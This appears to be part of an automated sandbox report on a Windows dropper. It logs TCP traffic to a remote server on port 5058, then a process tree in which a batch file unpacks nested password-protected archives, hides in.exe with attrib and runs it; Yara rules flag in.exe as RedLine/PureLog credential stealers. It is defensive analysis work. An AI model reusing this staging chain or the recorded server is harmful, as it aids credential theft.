Jul 26, 2024 19:26:04.389487982 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.389565945 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389725924 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389758110 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389774084 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389791012 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389808893 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389825106 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389856100 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389887094 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389918089 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389945984 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389975071 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389991045 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390028954 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390044928 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390060902 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390077114 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390093088 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390149117 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390177011 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390227079 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390273094 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390299082 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390316010 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390345097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390361071 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390403032 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390433073 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390459061 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390475035 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390516996 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390533924 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390549898 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390584946 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390607119 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390623093 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390650988 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390677929 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390693903 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390712023 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390826941 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390842915 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390938044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390959978 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.390999079 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.391014099 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.391031981 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.391539097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394412041 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394458055 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394474983 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394490957 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394506931 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394524097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.394597054 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.394809961 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.417340994 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.423288107 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.428145885 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.436161995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436250925 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436319113 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436346054 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436372995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436399937 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436444998 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436471939 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436546087 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436573029 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436600924 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436628103 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436654091 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436680079 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.436758995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.464118958 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.469510078 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.958062887 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.968473911 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.974123955 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.091404915 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.095679998 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.100949049 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.215053082 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.217519999 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.223412991 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.336599112 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.386080980 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.420007944 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.426709890 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.540339947 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.550690889 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.556356907 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.669076920 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.710902929 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.716181040 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.830651045 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.870337009 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.878741026 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:05.885580063 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:05.998773098 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.053832054 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:06.203649998 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:06.209145069 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.323407888 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.325865984 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:06.331537008 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.444520950 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.446923971 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:06.452387094 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.565496922 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.616209984 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:06.624941111 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625004053 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625032902 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625061035 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625087976 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625140905 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625174046 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625200987 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625649929 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625719070 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625746012 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625772953 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625798941 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.625824928 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.739435911 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:06.792190075 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.338018894 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.343424082 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.456994057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.460720062 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.465811014 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.582154036 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.587021112 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.592619896 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.705979109 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.706697941 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.711844921 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.824673891 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.825892925 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:07.831382990 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.945600986 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:07.970977068 CEST	49706	5058	192.168.2.5	23.94.183.150

Target ID:	0
Start time:	13:25:50
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe"
Imagebase:	0x400000
File size:	3'221'440 bytes
MD5 hash:	9795B9F24E9A98AE78F7CAD809ED1E2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	13:25:53
Start date:	26/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff624460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	13:25:53
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	13:25:53
Start date:	26/07/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff6ed610000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	13:25:53
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p324051139125346723019431074 -oextracted
Imagebase:	0x450000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	13:25:54
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x450000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	13:25:54
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x450000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	13:25:54
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x450000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	13:25:55
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x450000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	13:25:55
Start date:	26/07/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff656e40000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	13:25:55
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	true
Commandline:	"in.exe"
Imagebase:	0x420000
File size:	912'896 bytes
MD5 hash:	E8937B534F6C730C0A82793CCDDC0692
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true